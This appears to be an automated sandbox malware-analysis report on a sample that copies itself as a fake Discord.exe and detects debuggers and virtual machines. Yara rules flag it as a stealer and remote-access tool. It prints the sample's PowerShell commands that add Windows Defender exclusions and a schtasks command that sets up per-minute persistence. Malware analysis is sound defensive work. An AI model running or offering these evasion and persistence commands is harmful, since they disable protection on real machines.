Source: C:\Users\user\AppData\Roaming\Discord.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: Discord.exe.0.dr Binary or memory string: vmware
Source: s3OBQLA3xR.exe, Discord.exe.0.dr Binary or memory string: wQCovZLVGej8P2DgoDmpnj6MmF3M4jMR2qEH8rldPDYmc37BxcsAttOchGfsvSxbaH5Z
Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E764A CheckRemoteDebuggerPresent, 0_2_00007FFD9B7E764A
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Discord.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Discord.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Discord.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe" Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Queries volume information: C:\Users\user\Desktop\s3OBQLA3xR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe Queries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe Queries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe Queries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe Queries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe Queries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmp, s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED

Remote Access Functionality

barindex
Source: Yara match File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs